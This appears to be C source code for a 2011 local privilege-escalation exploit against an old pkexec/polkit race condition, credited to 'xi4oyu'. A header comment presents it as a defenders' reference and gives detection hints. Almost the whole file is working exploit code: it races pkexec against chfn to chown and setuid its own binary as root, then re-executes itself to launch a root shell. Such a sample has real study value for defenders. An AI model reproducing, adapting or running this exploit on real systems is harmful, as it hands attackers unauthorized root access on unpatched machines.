  1. #include <stdio.h>
  2. #include <limits.h>
  3. #include <time.h>
  4. #include <unistd.h>
  5. #include <termios.h>
  6. #include <sys/stat.h>
  7. #include <errno.h>
  8. #include <poll.h>
  9. #include <sys/types.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12.  
  13.  
  14.  
/*
 * Proof-of-concept for a 2011 pkexec race condition (author tag: "xi4oyu").
 * Kept as a reference sample for defenders: it only works against the
 * unpatched polkit of that era, and the mitigation is a current polkit.
 *
 * Detection hints derived from the calls below: pkexec being launched as
 * "/bin/sh -c /bin/chown root:root ...; /bin/chmod 4755 ...", bursts of
 * chfn executions with stdin/stdout/stderr closed, and a file under a
 * user-controlled path becoming root-owned with the setuid bit set.
 *
 * Structure: a loop of up to 500 attempts; each attempt forks a child that
 * itself forks a grandchild running pkexec, while the child runs chfn after a
 * tuned delay. The parent reads pkexec's output through pipe1, adjusts the
 * delay when it sees "does not match", and re-executes itself once stat()
 * reports the binary as root-owned and setuid. When started with euid 0 it
 * execs a shell directly.
 */
int main(int argc,char *argv[], char ** envp)
{
    time_t tim_seed1;
    pid_t pid_seed2;
    int result;
    struct stat stat_buff;

    char * chfn_path = "/usr/bin/chfn";   /* unused; chfn_argv[0] repeats the path */
    char cmd_buff[4096];                  /* shell command handed to pkexec */

    /* argv for the pkexec grandchild; cmd_buff is filled in by snprintf below */
    char * pkexec_argv[] = {
        "/usr/bin/pkexec",
        "/bin/sh",
        "-c",
        cmd_buff,
        NULL
    };
    int pipe1[2];   /* pkexec grandchild stdout/stderr -> parent */
    int pipe2[2];   /* grandchild -> child: one "ready" byte */
    int pipe3[2];   /* child -> grandchild: one "go" byte; the parent reuses its storage as a pollfd */
    pid_t pid,pid2 ;
    char * chfn_argv[] = {
        "/usr/bin/chfn",
        NULL
    };

    char buff[8];            /* target of the one-byte handshake reads */
    char read_buff[4096];    /* pkexec output captured by the parent */
    char real_path[512];     /* resolved path of this executable */
    struct termios termios_p; /* terminal state saved before children touch the tty */

    int count = 0;           /* remaining attempts */
    int flag = 0;            /* set just before the successful re-exec; never observed afterwards */
    int usleep1 = 0;         /* coarse delay, moved by 500us per attempt */
    int usleep2 = 0;         /* random jitter added to the delay */

    bzero(cmd_buff,4096);
    bzero(real_path,512);
    /* NOTE(review): realpath() return value is unchecked; on failure real_path
     * stays empty and the chown/chmod command below targets "" */
    realpath(argv[0],real_path);

    tim_seed1 = time(NULL);
    pid_seed2 = getpid();
    srand(tim_seed1+pid_seed2);

    //get terminal attr
    tcgetattr(0,&termios_p);
    /* 4095 leaves the final byte of cmd_buff as the terminator written by bzero */
    snprintf(cmd_buff,4095,"/bin/chown root:root %s; /bin/chmod 4755 %s",real_path,real_path);
    // printf("Cmd line:%s",cmd_buff);
    if(! geteuid()){
        //Succs => r00t!
        /* euid 0: this is the re-executed, now setuid-root, copy. Spawn a shell and stop. */
        char * exec_argv[2]={
            "/bin/sh",
            NULL
        };
        setuid(0);
        setgid(0);
        execve("/bin/sh",exec_argv,0);   /* envp NULL: the shell starts with an empty environment */
        perror("execve shell");
        exit(-1);
    }

    printf("pkexec local root exploit by xi4oyu , thx to dm\n");

    if(pipe(pipe1)){
        perror("pipe");
        exit(-2);
    }

    /* one fork()/poll() round per attempt; flag is never set on a path that returns here */
    for(count = 500; count && !flag; count--){

        // printf("Count %d\n",count);
        pid = fork();
        if( !pid ){
            /* fork() returned 0: this is the child (the original comment said "Parent") */
            if( !pipe(pipe2)){

                if(!pipe(pipe3)){
                    pid2 = fork();
                    if(!pid2){
                        /* grandchild: route stdout/stderr into pipe1 for the parent,
                         * signal readiness on pipe2, wait for the go byte on pipe3, run pkexec */
                        close(1);
                        close(2);
                        close(pipe1[0]);
                        dup2(pipe1[1],2);
                        dup2(pipe1[1],1);
                        close(pipe1[1]);
                        close(pipe2[0]);
                        close(pipe3[1]);
                        write(pipe2[1],"\xFF",1);
                        read(pipe3[0],&buff,1);   /* NOTE(review): &buff is char (*)[8]; read() only needs 1 byte */

                        execve(pkexec_argv[0],pkexec_argv,envp);
                        perror("execve pkexec");
                        exit(-3);

                    }
                    /* child: wait for the grandchild's ready byte, release it, then run chfn
                     * with all three standard descriptors closed after the tuned delay */
                    close(0);
                    close(1);
                    close(2);
                    close(pipe2[1]);
                    close(pipe3[0]);
                    read(pipe2[0],&buff,1);
                    write(pipe3[1],"\xFF",1);
                    usleep(usleep1+usleep2);

                    execve(chfn_argv[0],chfn_argv,envp);
                    perror("execve setuid");   /* stderr is closed here, so this is silent */
                    exit(1);
                }


            }
            /* reached when either pipe2 or pipe3 could not be created */
            perror("pipe3");
            exit(1);
        }

        /* parent (fork() returned the child's pid): pipe3 is unused here, so its 8 bytes
         * are reinterpreted as a struct pollfd to watch pipe1[0].
         * NOTE(review): this is a strict-aliasing violation and relies on
         * sizeof(struct pollfd) fitting in sizeof(pipe3); a real struct pollfd would be correct. */
        memset(pipe3,0,8);

        struct pollfd * pollfd = (struct pollfd *)(&pipe3);
        pollfd->fd = pipe1[0];
        pollfd->events = POLLRDNORM;

        /* wait up to 1 second for pkexec output from this attempt */
        if(poll(pollfd,1,1000) < 0){

            perror("poll");
            exit(1);
        }

        if(pollfd->revents & POLLRDNORM ){
            memset(read_buff,0,4096);
            read(pipe1[0],read_buff,4095);   /* return value unchecked; read_buff stays NUL-terminated via memset */
            /* pkexec's "does not match" message steers the delay for the next attempt */
            if( strstr(read_buff,"does not match")){
                usleep1 += 500;
                usleep2 = rand() % 1000;

            }else{
                usleep1 -= 500;


            }


        }

        /* success check: this binary now owned by root:root with the setuid bit
         * (0x800 == S_ISUID, 04000 octal) */
        if(!stat(real_path,&stat_buff)){
            if(!stat_buff.st_uid){
                if(!stat_buff.st_gid){
                    if(stat_buff.st_mode & 0x800){

                        char *exec_array[]={
                            real_path,
                            NULL
                        };

                        flag = 1;
                        tcsetattr(0,2,&termios_p);   /* 2 == TCSAFLUSH on Linux: restore the saved tty state */
                        execve(real_path,exec_array,0);   /* re-exec self; the euid-0 branch above then runs */
                        perror("execve self");
                        exit(1);
                    }
                }

            }
        }

        /* restore the tty after each attempt, since chfn/pkexec may have changed it */
        tcsetattr(0,2,&termios_p);

    }
    result = 0;
    return result;

}
  193.  
  194.  
  195. # [2011-10-08]
  196.  